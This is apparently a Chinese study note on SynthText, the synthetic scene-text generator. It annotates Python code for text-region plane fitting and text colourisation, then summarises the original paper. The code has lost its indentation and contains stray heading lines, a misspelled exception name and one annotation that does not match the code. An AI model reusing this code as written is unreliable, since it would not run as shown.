    # 从点云数据 xyz 中筛选出属于当前区域的点坐标 pt
    pt = xyz[mask]
    # 调用 su.isplanar 函数,以点云数据 pt、采样点集 pt_sample,以及一些阈值参数为输入,进行平面检测。如果检测到平面,返回的 plane_model 中包含平面系数、支持点索引等信息。
    plane_model = su.isplanar(pt, pt_sample,
    TextRegions.dist_thresh,
    TextRegions.num_inlier,
    TextRegions.min_z_projection)
    # 在平面检测结果存在且满足一些要求(例如深度阈值、内点数量等)的情况下,将平面信息存储到 plane_info 字典中的相应字段中。
    if plane_model is not None:
    plane_coeff = plane_model[0]
    if np.abs(plane_coeff[2])>TextRegions.min_z_projection:
    plane_info['label'].append(l)
    plane_info['coeff'].append(plane_model[0])
    plane_info['support'].append(plane_model[1])
    plane_info['rot'].append(regions['rot'][idx])
    plane_info['area'].append(regions['area'][idx])

    return plane_info

    @staticmethod
    def get_regions(xyz,seg,area,label):
    """
    根据给定的点云数据、分割结果、区域面积和区域标签,获取文本区域
    :xyz: 点云坐标数据
    :seg: 分割结果
    :area: 区域面积
    :label: 数据标签
    """
    # 函数调用 TextRegions.filter 函数,以分割结果 seg、区域面积 area 和区域标签 label 为输入,对分割结果进行筛选,获取文本区域的初始信息,保存在变量 regions 中
    regions = TextRegions.filter(seg,area,label)
    # fit plane to text-regions:
    # 调用 TextRegions.filter_depth 函数,以点云数据 xyz、分割结果 seg 和文本区域信息 regions 为输入,对每个区域进行深度滤波,获取满足条件的平面信息,更新存储平面信息的 regions 变量
    regions = TextRegions.filter_depth(xyz,seg,regions)
    # 函数返回经过深度滤波后的文本区域信息 regions
    return regions

    colorize3_poisson.py

    import cv2 as cv
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.interpolate as si
    import scipy.ndimage as scim
    import scipy.ndimage.interpolation as sii
    import os
    import os.path as osp
    #import cPickle as cp
    import _pickle as cp
    #import Image
    from PIL import Image
    from poisson_reconstruct import blit_images
    import pickle

    sample_weighted()

    def sample_weighted(p_dict):
    """
    接收一个字典 p_dict,用于表示概率分布,其中键表示某个值,值表示对应的概率。函数首先获取概率分布中的键,并使用 np.random.choice 函数根据概率分布进行随机采样,返回所选的键
    """
    ps = p_dict.keys()
    return ps[np.random.choice(len(ps),p=p_dict.values())]

    class Layer()

    class Layer(object):

    def __init__(self,alpha,color):

    # alpha for the whole image:
    # 针对 alpha 参数,函数要求其维度为 2(二维矩阵)。然后获取 alpha 的形状,并保存在变量 [n, m] 中
    assert alpha.ndim==2
    self.alpha = alpha
    [n,m] = alpha.shape[:2]
    # 针对 color 参数,函数将其转换为 uint8 类型的数组。
    color=np.atleast_1d(np.array(color)).astype('uint8')
    # color for the image:
    # 根据 color 的长度决定是灰度图还是彩色图,然后创建相应维度的颜色矩阵
    # 如果 color 维度为 1,则表示整个图层都是固定颜色
    if color.ndim==1: # constant color for whole layer
    ncol = color.size
    if ncol == 1 : #grayscale layer
    self.color = color * np.ones((n,m,3),'uint8')
    if ncol == 3 :
    self.color = np.ones((n,m,3),'uint8') * color[None,None,:]
    # 如果 color 维度为 2,表示是灰度图,将其转换为三通道的颜色矩阵
    elif color.ndim==2: # grayscale image
    self.color = np.repeat(color[:,:,None],repeats=3,axis=2).copy().astype('uint8')
    # 如果 color 维度为 3,表示是彩色图,直接保存为颜色矩阵
    elif color.ndim==3: #rgb image
    self.color = color.copy().astype('uint8')
    # 如果以上情况都不满足,则抛出异常
    else:
    print (color.shape)
    raise excerption("color datatype not understood")

    class FontColor()

    class FontColor(object):

    def __init__(self, col_file):
    """
    这是一个构造函数,用于创建 FontColor 对象并初始化对象的属性
    """
    with open(col_file,'rb') as f:
    """
    使用 open() 函数打开名为 col_file 的文件,并将其指定为二进制模式读取('rb')
    """
    #self.colorsRGB = cp.load(f)
    # 创建一个 _Unpickler 对象 u,用于反序列化从文件中读取的数据
    u = pickle._Unpickler(f)
    # 设置 Unpickler 的编码方式为 'latin1',以确保正确解析文件中的数据
    u.encoding = 'latin1'
    # 调用 Unpickler 对象的 load() 方法,从文件中加载数据并将其存储在变量 p 中
    p = u.load()
    # 将加载的数据赋值给对象的属性 colorsRGB,该属性存储颜色数据
    self.colorsRGB = p
    # 计算颜色数据的行数,并将结果存储在对象的属性 ncol 中
    self.ncol = self.colorsRGB.shape[0]

    # convert color-means from RGB to LAB for better nearest neighbour
    # computations:
    # 从颜色数据中提取 RGB 通道的数据,并将其转换为 LAB 颜色空间
    self.colorsLAB = np.r_[self.colorsRGB[:,0:3], self.colorsRGB[:,6:9]].astype('uint8')
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 颜色数据转换为 LAB 颜色空间,并调整维度以去除多余的维度
    self.colorsLAB = np.squeeze(cv.cvtColor(self.colorsLAB[None,:,:],cv.COLOR_RGB2Lab))


    def sample_normal(self, col_mean, col_std):
    """
    sample from a normal distribution centered around COL_MEAN
    with standard deviation = COL_STD.
    这是一个用于从正态分布中采样颜色的方法。它接受两个参数,col_mean 和 col_std,分别表示正态分布的均值和标准差
    """
    # 使用 np.random.randn() 函数从标准正态分布中生成一个随机数,并乘以 col_std,再加上 col_mean,得到采样的颜色
    col_sample = col_mean + col_std * np.random.randn()
    # 使用 np.clip() 函数将采样的颜色限制在 0 到 255 之间,然后使用 astype() 函数将其转换为整数类型 (uint8) 并返回
    return np.clip(col_sample, 0, 255).astype('uint8')

    def sample_from_data(self, bg_mat):
    """
    bg_mat : this is a nxmx3 RGB image. 一个从数据集中采样颜色的方法。它接受一个参数bg_mat,表示一个RGB图像。

    returns a tuple : (RGB_foreground, RGB_background)
    each of these is a 3-vector.
    """
    # 复制输入的背景图像,以备后续使用
    bg_orig = bg_mat.copy()
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 图像转换为 LAB 颜色空间
    bg_mat = cv.cvtColor(bg_mat, cv.COLOR_RGB2Lab)
    # 将背景颜色矩阵重塑为一个二维数组,每一行代表一个像素点的颜色
    bg_mat = np.reshape(bg_mat, (np.prod(bg_mat.shape[:2]),3))
    # 计算背景颜色矩阵的均值,得到一组代表整个背景图像颜色的平均值
    bg_mean = np.mean(bg_mat,axis=0)

    # 计算每个颜色数据与背景颜色之间的欧氏距离,并存储在 norms 数组中
    norms = np.linalg.norm(self.colorsLAB-bg_mean[None,:], axis=1)
    # choose a random color amongst the top 3 closest matches:
    #nn = np.random.choice(np.argsort(norms)[:3])
    # 找到欧氏距离最小的颜色数据的索引,即与背景颜色最相近的颜色数据
    nn = np.argmin(norms)

    # nearest neighbour color:
    # 获取与背景颜色最相近的颜色数据。
    data_col = self.colorsRGB[np.mod(nn,self.ncol),:]

    # 使用 sample_normal 方法从颜色数据的前半部分采样一个颜色作为前景颜色。
    col1 = self.sample_normal(data_col[:3],data_col[3:6])
    # 使用 sample_normal 方法从颜色数据的后半部分采样一个颜色作为背景颜色。
    col2 = self.sample_normal(data_col[6:9],data_col[9:12])

    # 判断最相近的颜色是否来自于数据集中已有的颜色。
    if nn < self.ncol:
    return (col2, col1) # 返回(col2, col1),即背景颜色在前,前景颜色在后。
    else:
    # need to swap to make the second color close to the input backgroun color
    return (col1, col2) # 前景颜色在前,背景颜色在后。

    def mean_color(self, arr):
    """
    将输入图像转换为 HSV 颜色空间,并计算其所有像素点的平均颜色,最后将该颜色值转换回 RGB 空间并返回。
    """
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 图像转换为 HSV 颜色空间。
    col = cv.cvtColor(arr, cv.COLOR_RGB2HSV)
    # 将颜色矩阵重新塑造为一个二维数组,每一行表示一个像素点的颜色。
    col = np.reshape(col, (np.prod(col.shape[:2]),3))
    # 计算颜色矩阵的均值,得到一组代表整个图像颜色的平均值,并将其转换为 8 位无符号整数(uint8)。
    col = np.mean(col,axis=0).astype('uint8')
    # 使用 OpenCV 的 cvtColor() 函数将 HSV 颜色空间中的颜色转换回 RGB 颜色空间,并将颜色数组压缩为一维数组,作为平均颜色的值返回。
    return np.squeeze(cv.cvtColor(col[None,None,:],cv.COLOR_HSV2RGB))

    def invert(self, rgb):
    """
    反色
    """
    rgb = 127 + rgb
    return rgb

    def complement(self, rgb_color):
    """
    返回与给定 RGB 颜色值(rgb_color)互补的颜色
    return a color which is complementary to the RGB_COLOR.
    """
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 颜色值转换为 HSV 颜色空间,并将颜色数组压缩为一维数组
    col_hsv = np.squeeze(cv.cvtColor(rgb_color[None,None,:], cv.COLOR_RGB2HSV))
    # 将HSV颜色值中的色调(Hue)加上128,实现颜色互补的效果。注意,这里的色调值需要进行取模操作,以确保它在0到255的范围内。
    col_hsv[0] = col_hsv[0] + 128 #uint8 mods to 255
    # 使用 OpenCV 的 cvtColor() 函数将修改后的 HSV 值转回 RGB 颜色空间,并将颜色数组压缩为一维数组。
    col_comp = np.squeeze(cv.cvtColor(col_hsv[None,None,:],cv.COLOR_HSV2RGB))
    # 返回互补颜色的 RGB 值
    return col_comp

    def triangle_color(self, col1, col2):
    """
    返回与给定两种 RGB 颜色值(col1和col2)相对应的颜色
    计算相对颜色的方法,它接受两个表示 RGB 颜色值的参数 col1 和 col2
    Returns a color which is "opposite" to both col1 and col2.
    """
    # 将输入的col1和col2转换为NumPy数组。
    col1, col2 = np.array(col1), np.array(col2)
    # 使用 OpenCV 的 cvtColor() 函数将 col1 从 RGB 颜色空间转换为 HSV 颜色空间,并将颜色数组压缩为一维数组。
    col1 = np.squeeze(cv.cvtColor(col1[None,None,:], cv.COLOR_RGB2HSV))
    # col2 也是
    col2 = np.squeeze(cv.cvtColor(col2[None,None,:], cv.COLOR_RGB2HSV))
    # 获取col1和col2的色调值(Hue)。
    h1, h2 = col1[0], col2[0]
    # 如果 h2 小于 h1,则交换它们的值,确保 h1 始终小于等于 h2。
    if h2 < h1 : h1,h2 = h2,h1 #swap
    # 计算 h2 和 h1 之间的差值。
    dh = h2-h1
    # 如果差值 dh 小于 127,则将 dh 设置为 255 减去 dh,实现相对颜色的计算。
    if dh < 127: dh = 255-dh
    # 将 col1 的色调值设置为 h1 加上 dh 的一半,以获得相对颜色的色调值
    col1[0] = h1 + dh/2
    # 使用 OpenCV 的 cvtColor() 函数将修改后的HSV值转回RGB颜色空间,并将颜色数组压缩为一维数组,并返回相对颜色的RGB值
    return np.squeeze(cv.cvtColor(col1[None,None,:],cv.COLOR_HSV2RGB))

    def change_value(self, col_rgb, v_std=50):
    """
    随机改变给定RGB颜色值(col_rgb)的亮度值。
    这是一个改变颜色亮度的方法,它接受一个表示 RGB 颜色值的参数 col_rgb 和一个可选的标准差 v_std
    """
    # 使用 OpenCV 的 cvtColor() 函数将 col_rgb 从 RGB 颜色空间转换为 HSV 颜色空间,并将颜色数组压缩为一维数组。
    col = np.squeeze(cv.cvtColor(col_rgb[None,None,:], cv.COLOR_RGB2HSV))
    # 获取 col 的亮度值(Value)。
    x = col[2]
    # 生成一个从 0 到 1 均匀分布的值数组。
    vs = np.linspace(0,1)
    # 计算每个值与 x / 255.0 的差的绝对值,得到一个代表每个值与 x 的差异程度的数组。
    ps = np.abs(vs - x/255.0)
    # 将数组 ps 归一化,使其总和等于 1
    ps /= np.sum(ps)
    # 从 vs 数组中根据权重 ps 随机选择一个值,并添加一个服从正态分布的小的随机偏移(以标准差 0.1 * v_std 为基础),然后将其限制在 0 到 1 之间。
    v_rand = np.clip(np.random.choice(vs,p=ps) + 0.1*np.random.randn(),0,1)
    # 将 col 的亮度值设置为 255 乘以 v_rand,以获得新的亮度值
    col[2] = 255*v_rand
    return np.squeeze(cv.cvtColor(col[None,None,:],cv.COLOR_HSV2RGB))

    class Colorize()

    class Colorize(object):

    def __init__(self, model_dir='data'):#, im_path):
    # 类的初始化方法,接受一个可选参数 model_dir 作为输入。
    # # get a list of background-images:
    # imlist = [osp.join(im_path,f) for f in os.listdir(im_path)]
    # self.bg_list = [p for p in imlist if osp.isfile(p)]

    # 创建一个 FontColor 对象,并将颜色文件的路径作为参数传递给 FontColor 类的初始化方法。这个颜色文件的路径是通过将 model_dir 和 'models/colors_new.cp' 拼接而成的。
    self.font_color = FontColor(col_file=osp.join(model_dir,'models/colors_new.cp'))

    # probabilities of different text-effects:
    # add bevel effect to text 添加文字凸起效果的概率
    self.p_bevel = 0.05
    # just keep the outline of the text 只保留文字轮廓的概率
    self.p_outline = 0.05
    # 添加文字投影的概率
    self.p_drop_shadow = 0.15
    # 添加文字边框的概率
    self.p_border = 0.15
    # add background-based bump-mapping
    # 基于背景添加文字的凹凸映射效果的概率
    self.p_displacement = 0.30
    # use an image for coloring text 使用图像为文字上色的概率
    self.p_texture = 0.0


    def drop_shadow(self, alpha, theta, shift, size, op=0.80):
    """
    给输入的 alpha 图像添加投影效果,并返回带有投影效果的图像。投影的效果由参数 alpha、theta、shift、size 和 op 来控制。
    alpha : alpha layer whose shadow need to be cast
    theta : [0,2pi] -- the shadow direction
    shift : shift in pixels of the shadow
    size : size of the GaussianBlur filter
    op : opacity of the shadow (multiplying factor)

    @return : alpha of the shadow layer
    (it is assumed that the color is black/white)
    """
    if size%2==0: # 如果 size 是偶数,将其减 1 以确保 size 是奇数
    size -= 1
    size = max(1,size)
    # 使用 OpenCV 的 GaussianBlur 函数对输入的 alpha 图像进行高斯模糊,模糊核的大小为 (size, size),标准差为 0。这样可以产生投影的模糊效果。
    shadow = cv.GaussianBlur(alpha,(size,size),0)
    # 根据投影的角度 theta 和平移距离 shift 计算投影在 x 和 y 方向上的偏移量。
    [dx,dy] = shift * np.array([-np.sin(theta), np.cos(theta)])
    # 使用 scipy 库中的 shift 函数对阴影图像进行平移操作,并乘以一个 opacity 因子 op。平移的偏移量由步骤 5 计算得到。此外,设置了平移模式为 'constant',边界填充值为 0。
    shadow = op*sii.shift(shadow, shift=[dx,dy],mode='constant',cval=0)
    return shadow.astype('uint8')

    def border(self, alpha, size, kernel_type='RECT'):
    """
    alpha : alpha layer of the text
    size : size of the kernel
    kernel_type : one of [rect,ellipse,cross]

    @return : alpha layer of the border (color to be added externally).
    """
    # 定义了 kernel_type 和对应的形态学操作类型。
    kdict = {'RECT':cv.MORPH_RECT, 'ELLIPSE':cv.MORPH_ELLIPSE,
    'CROSS':cv.MORPH_CROSS}
    # 使用 OpenCV 的 getStructuringElement 函数创建指定大小和形状的卷积核,以在 alpha 图像周围创建边框。这里的 kdict[kernel_type] 会返回 rect、ellipse 或 cross 中一个值,而 (size, size) 是指卷积核的大小。
    kernel = cv.getStructuringElement(kdict[kernel_type],(size,size))
    # 使用 OpenCV 的 dilate 函数对输入的 alpha 图像进行膨胀操作,以使边框变得更突出。这里的 iterations=1 表示只进行一次膨胀操作。最后,减去 alpha 层,得到新的 alpha 层。这样,在文本周围会出现黑色的边框。
    border = cv.dilate(alpha,kernel,iterations=1) # - alpha
    return border

    def blend(self,cf,cb,mode='normal'):
    """
    在这个方法中,函数只返回了前景图像。这表明该函数还没有完成或者是开发者忘记编写具体的合成算法。
    """
    return cf

    def merge_two(self,fore,back,blend_type=None):
    """
    merge two FOREground and BACKground layers.
    ref: https://en.wikipedia.org/wiki/Alpha_compositing
    ref: Chapter 7 (pg. 440 and pg. 444):
    http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
    """
    # 将前景图层的 alpha 通道值转换为范围在 0 到 1 之间的浮点数,表示不透明度
    a_f = fore.alpha/255.0
    # 将背景图层的 alpha 通道值转换为范围在 0 到 1 之间的浮点数,表示不透明度
    a_b = back.alpha/255.0
    # 获取前景图层的颜色通道值
    c_f = fore.color
    # 获取背景图层的颜色通道值
    c_b = back.color
    # 根据 Alpha 合成公式计算新的合成后的图像的 alpha 值
    a_r = a_f + a_b - a_f*a_b
    if blend_type != None:
    # 使用之前提到的 blend() 方法将前景和背景的颜色进行合成,得到混合后的颜色
    c_blend = self.blend(c_f, c_b, blend_type)
    # 以混合后的颜色为基础,按照 Alpha 合成公式计算新的合成后的图像的颜色值
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + ((1-a_b)*a_f)[:,:,None] * c_f
    + (a_f*a_b)[:,:,None] * c_blend )
    else:
    # c_r 的计算只根据前景和背景的颜色以及各自的不透明度进行合成
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + a_f[:,:,None]*c_f )
    # 返回一个新的图层对象,其中包含合成后的图像的 alpha 和颜色通道值
    return Layer((255*a_r).astype('uint8'), c_r.astype('uint8'))

    def merge_down(self, layers, blends=None):
    """
    将多个图层逐层合并成单个图层
    layers : [l1,l2,...ln] : a list of LAYER objects.
    l1 is on the top, ln is the bottom-most layer.
    blend : the type of blend to use. Should be n-1.
    use None for plain alpha blending.
    Note : (1) it assumes that all the layers are of the SAME SIZE.
    @return : a single LAYER type object representing the merged-down image
    """
    nlayers = len(layers) # 获取图层数量
    if nlayers > 1: # 检查是否有多个图层需要合并
    [n,m] = layers[0].alpha.shape[:2] # 获取第一个图层的尺寸
    out_layer = layers[-1] # 初始化输出图层为最底层的图层
    # 从倒数第二个图层开始循环遍历,直到最顶层的图层
    for i in range(-2,-nlayers-1,-1):
    blend=None
    if blends is not None:
    blend = blends[i+1]
    out_layer = self.merge_two(fore=layers[i], back=out_layer,blend_type=blend)
    return out_layer
    else:
    return layers[0]

    def resize_im(self, im, osize):
    # 将输入的图像调整为指定的大小
    return np.array(Image.fromarray(im).resize(osize[::-1], Image.BICUBIC))

    def occlude(self):
    """
    somehow add occlusion to text.
    这个方法 occlude() 是一个占位方法,还未实现其具体功能。

    根据注释中的描述,该方法的目的是向文本中添加遮挡效果。然而,在代码中该方法没有任何实现,只有一个空的 pass 语句。这意味着在当前的代码实现中,该方法没有具体的功能。

    如果你希望实现该方法,你可以根据具体需求和设计思路,编写代码来实现添加遮挡效果的逻辑。例如,可以使用图像处理技术在文本区域上添加遮挡元素,或者通过修改文本的视觉特征来模拟遮挡效果。具体的实现方式取决于你的需求和想要实现的效果。
    """
    pass

    def color_border(self, col_text, col_bg):
    """
    用于确定边框的颜色的选择逻辑
    Decide on a color for the border:
    - could be the same as text-color but lower/higher 'VALUE' component. 边框颜色与文本颜色相同,但是 'VALUE' 分量较低或较高
    - could be the same as bg-color but lower/higher 'VALUE'. 边框颜色与背景颜色相同,但是 'VALUE' 分量较低或较高
    - could be 'mid-way' color b/w text & bg colors. 边框颜色为文本颜色和背景颜色之间的中间颜色。
    """
    # 随机选择一个数字,范围是 0 到 2,用于决定使用哪种方式选择边框颜色
    choice = np.random.choice(3)
    # 将输入的文本颜色 col_text 转换为 HSV 格式,以便于处理颜色的亮度等特征
    col_text = cv.cvtColor(col_text, cv.COLOR_RGB2HSV)
    # 将 col_text 变形为一维数组,并计算其均值,得到颜色的平均值
    col_text = np.reshape(col_text, (np.prod(col_text.shape[:2]),3))
    col_text = np.mean(col_text,axis=0).astype('uint8')
    # 通过线性插值,定义了一个从 0 到 1 的值序列,用于生成随机样本
    vs = np.linspace(0,1)
    def get_sample(x):
    """
    通过计算与目标值 x/255.0 的差距,选择一个随机样本,并在其上加入一定的随机扰动。返回取样结果乘以 255,得到一个颜色分量值。
    """
    ps = np.abs(vs - x/255.0)
    ps /= np.sum(ps)
    v_rand = np.clip(np.random.choice(vs,p=ps) + 0.1*np.random.randn(),0,1)
    return 255*v_rand

    # first choose a color, then inc/dec its VALUE:
    # 根据选择的方式进行不同的处理
    if choice==0:
    # increase/decrease saturation:
    # 增加或减少饱和度
    col_text[0] = get_sample(col_text[0]) # saturation
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    elif choice==1:
    # get the complementary color to text:
    # 获取文本颜色的互补色
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.complement(col_text)
    else:
    # choose a mid-way color:
    # 选择文本颜色和背景颜色的中间颜色
    col_bg = cv.cvtColor(col_bg, cv.COLOR_RGB2HSV)
    col_bg = np.reshape(col_bg, (np.prod(col_bg.shape[:2]),3))
    col_bg = np.mean(col_bg,axis=0).astype('uint8')
    col_bg = np.squeeze(cv.cvtColor(col_bg[None,None,:],cv.COLOR_HSV2RGB))
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.triangle_color(col_text,col_bg)

    # now change the VALUE channel:
    # 将处理后的颜色转换为 HSV 格式,并修改亮度通道的值。
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_RGB2HSV))
    col_text[2] = get_sample(col_text[2]) # value
    # 最后,将处理后的颜色转换为 RGB 格式,并返回结果
    return np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))

    def color_text(self, text_arr, h, bg_arr):
    """
    用于确定文本的颜色。具体而言,该方法采用以下几种方式之一来选择文本的颜色
    Decide on a color for the text:
    - could be some other random image. 从其他随机图像中选择一个颜色作为文本的颜色
    - could be a color based on the background. 根据背景选择一个颜色
    this color is sampled from a dictionary built
    from text-word images' colors. The VALUE channel
    is randomized.
    这个颜色是从建立在文本单词图像颜色上的字典中进行采样的。其中,颜色的亮度通道 (VALUE) 是随机化的

    H : minimum height of a character
    """
    # 定义变量,用于存储背景色和文本颜色
    bg_col,fg_col,i = 0,0,0
    # 从文本单词图像颜色构建的字典中采样一个颜色作为文本颜色,并将结果分别赋值给 fg_col 和 bg_col
    fg_col,bg_col = self.font_color.sample_from_data(bg_arr)
    # 创建一个 Layer 对象,将 text_arr 作为透明度 (alpha) 通道,将 fg_col 作为颜色 (color) 通道,并返回该对象以及 fg_col 和 bg_col
    return Layer(alpha=text_arr, color=fg_col), fg_col, bg_col


    def process(self, text_arr, bg_arr, min_h):
    """
    用于将文本图层 text_arr 融合到背景图像 bg_arr 上
    text_arr : one alpha mask : nxm, uint8
    bg_arr : background image: nxmx3, uint8
    min_h : height of the smallest character (px)

    return text_arr blit onto bg_arr.
    """
    # decide on a color for the text:
    # 调用 color_text 方法确定文本的颜色,并将结果的透明度通道 l_text、文本颜色 fg_col 和背景颜色 bg_col 分别赋值给变量
    l_text, fg_col, bg_col = self.color_text(text_arr, min_h, bg_arr)
    # 根据文本的透明度通道 l_text.alpha 构建一个新的图层 l_bg,其中颜色通道为 bg_col
    bg_col = np.mean(np.mean(bg_arr,axis=0),axis=0)
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'),color=bg_col)
    # 将 l_text 的透明度乘以一个随机化的权重,并将结果限制在 0.72 到 1.0 之间
    l_text.alpha = l_text.alpha * np.clip(0.88 + 0.1*np.random.randn(), 0.72, 1.0)
    layers = [l_text]
    blends = []

    # add border:
    if np.random.rand() < self.p_border:
    # 根据最小高度 min_h 确定边界的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5
    border_a = self.border(l_text.alpha, size=bsz)
    # 使用 border 方法创建一个边界图层 l_border,其中边界的透明度为 l_text.alpha,颜色为根据 l_text.color 和 l_bg.color 确定的边界颜色
    l_border = Layer(border_a, self.color_border(l_text.color,l_bg.color))
    # 将 l_border 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_border)
    blends.append('normal')

    # add shadow:
    # 如果随机数小于 p_drop_shadow(可能是一个阴影的概率):
    if np.random.rand() < self.p_drop_shadow:
    # shadow gaussian size:
    # 根据最小高度 min_h 确定阴影的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5

    # shadow angle: 随机选择阴影的角度
    theta = np.pi/4 * np.random.choice([1,3,5,7]) + 0.5*np.random.randn()

    # shadow shift: 根据最小高度 min_h 确定阴影的偏移量 shift
    if min_h <= 15 : shift = 2
    elif 15 < min_h < 30: shift = 7+np.random.randn()
    else: shift = 15 + 3*np.random.randn()

    # opacity: 根据最小高度 min_h 确定阴影的不透明度 op
    op = 0.50 + 0.1*np.random.randn()
    # 使用 drop_shadow 方法创建一个阴影图层 l_shadow,其中阴影的透明度为 l_text.alpha,颜色为 0
    shadow = self.drop_shadow(l_text.alpha, theta, shift, 3*bsz, op)
    l_shadow = Layer(shadow, 0)
    # 将 l_shadow 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_shadow)
    blends.append('normal')

    # 创建一个新的图层 l_bg,颜色通道为 bg_arr
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_col)
    # 将 l_bg 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_bg)
    blends.append('normal')
    # 将所有图层融合成一个图层
    l_normal = self.merge_down(layers,blends)
    # now do poisson image editing: 使用泊松图像编辑算法
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_arr)
    l_out = blit_images(l_normal.color,l_bg.color.copy())

    # plt.subplot(1,3,1)
    # plt.imshow(l_normal.color)
    # plt.subplot(1,3,2)
    # plt.imshow(l_bg.color)
    # plt.subplot(1,3,3)
    # plt.imshow(l_out)
    # plt.show()

    # 如果融合后的图像 l_out 为 None,则将最后一个图层 l_bg 替换为 l_bg,并返回最终融合后的图像颜色
    if l_out is None:
    # poisson recontruction produced
    # imperceptible text. In this case,
    # just do a normal blend:
    layers[-1] = l_bg
    return self.merge_down(layers,blends).color

    return l_out


    def check_perceptible(self, txt_mask, bg, txt_bg):
    """
    这是一个被弃用的方法 check_perceptible,它用于检查文本与背景图像合并后是否仍然可见。
    --- DEPRECATED; USE GRADIENT CHECKING IN POISSON-RECONSTRUCT INSTEAD ---

    checks if the text after merging with background
    is still visible.
    txt_mask (hxw) : binary image of text -- 255 where text is present
    0 elsewhere
    bg (hxwx3) : original background image WITHOUT any text.
    txt_bg (hxwx3) : image with text.
    """
    bgo,txto = bg.copy(), txt_bg.copy()
    txt_mask = txt_mask.astype('bool')
    bg = cv.cvtColor(bg.copy(), cv.COLOR_RGB2Lab)
    txt_bg = cv.cvtColor(txt_bg.copy(), cv.COLOR_RGB2Lab)
    bg_px = bg[txt_mask,:]
    txt_px = txt_bg[txt_mask,:]
    bg_px[:,0] *= 100.0/255.0 #rescale - L channel
    txt_px[:,0] *= 100.0/255.0

    diff = np.linalg.norm(bg_px-txt_px,ord=None,axis=1)
    diff = np.percentile(diff,[10,30,50,70,90])
    print ("color diff percentile :", diff)
    return diff, (bgo,txto)

    def color(self, bg_arr, text_arr, hs, place_order=None, pad=20):
    """
    将文本图像着色
    Return colorized text image.

    text_arr : list of (n x m) numpy text alpha mask (unit8).
    hs : list of minimum heights (scalar) of characters in each text-array.
    text_loc : [row,column] : location of text in the canvas.
    canvas_sz : size of canvas image.

    return : nxmx3 rgb colorized text-image.
    """
    # 复制输入的背景图像
    bg_arr = bg_arr.copy()
    # 如果背景图像是灰度图像(二维)或单通道图像(shape[2] == 1),则将其转换为三通道图像
    if bg_arr.ndim == 2 or bg_arr.shape[2]==1: # grayscale image:
    bg_arr = np.repeat(bg_arr[:,:,None], 3, 2)

    # get the canvas size:
    # 获取背景图像的尺寸
    canvas_sz = np.array(bg_arr.shape[:2])

    # initialize the placement order:
    # 初始化放置文本的顺序
    if place_order is None:
    place_order = np.array(range(len(text_arr)))

    rendered = []
    # 对每个文本数组进行处理
    for i in place_order[::-1]:
    # get the "location" of the text in the image:
    # this is the minimum x and y coordinates of text:
    # 获取文本在图像中的位置。
    loc = np.where(text_arr[i])
    # 计算文本区域的最小点和最大点,并计算出文本区域的宽度和高度
    lx, ly = np.min(loc[0]), np.min(loc[1])
    mx, my = np.max(loc[0]), np.max(loc[1])
    l = np.array([lx,ly])
    m = np.array([mx,my])-l+1
    text_patch = text_arr[i][l[0]:l[0]+m[0],l[1]:l[1]+m[1]]

    # figure out padding:
    ext = canvas_sz - (l+m)
    num_pad = pad*np.ones(4,dtype='int32')
    num_pad[:2] = np.minimum(num_pad[:2], l)
    num_pad[2:] = np.minimum(num_pad[2:], ext)
    text_patch = np.pad(text_patch, pad_width=((num_pad[0],num_pad[2]), (num_pad[1],num_pad[3])), mode='constant')
    l -= num_pad[:2]

    w,h = text_patch.shape
    bg = bg_arr[l[0]:l[0]+w,l[1]:l[1]+h,:]

    # 使用方法 process 对文本进行着色处理,返回着色后的文本图像
    rdr0 = self.process(text_patch, bg, hs[i])
    rendered.append(rdr0)

    # 将着色后的文本图像放回到背景图像的相应位置
    bg_arr[l[0]:l[0]+w,l[1]:l[1]+h,:] = rdr0#rendered[-1]

    # 返回最终的背景图像
    """
    需要注意的是,当前代码中存在一个问题,即在 for 循环中的最后一行使用了 return,导致循环只执行一次。可能是由于代码缩进错误导致的。如果确实需要返回结果,则应将该行移动到 for 循环结束后再执行。
    """
    return bg_arr

    return bg_arr
    ]]>
    + 资源

    原文

    Abstract

    1. 提出了一个数据集合成引擎,以一种自然的方式将合成文本覆盖到现有的背景图像上,考虑到局部 3D 场景的几何形状。
    2. 一个新的全卷积回归网络 FRCN,解决文本检测问题。在 ICDAR 2013 上获得 84.2% 的 F-Score。

    1 Introduction

    1. 介绍了文本识别的意义,检测管道的性能成为文本识别的新瓶颈:在一个文本识别网络中,正确裁剪单词的识别准确率为 98%,而端到端文本识别 f 值仅为 69%。

    2. 提出了一种新的数据集合成引擎,生成的数据集称为 SynthText in the Wild。

    3. 还提出了一个文本检测模型,但是这玩意太老了估计现在不会用了

    1. 介绍了基于 CNN 的目标检测
    2. 介绍了合成数据集
    3. 介绍了数据增强的方法

    2 Synthetic Text in the Wild

    我们提出的合成引擎:

    1. 真实
    2. 自动化
    3. 快速

    文本生成管道:

    1. 获取合适的文本和图像样本

    2. 根据局部颜色和纹理线索将图像分割成连续的区域

    3. 使用 CNN 获得密集的逐像素深度图

    4. 对每个相邻区域估计一个局部表面法线

    5. 根据区域的颜色选择文本和可选的轮廓的颜色

    6. 使用随机选择的字体渲染文本样本,并根据局部表面方向进行转换

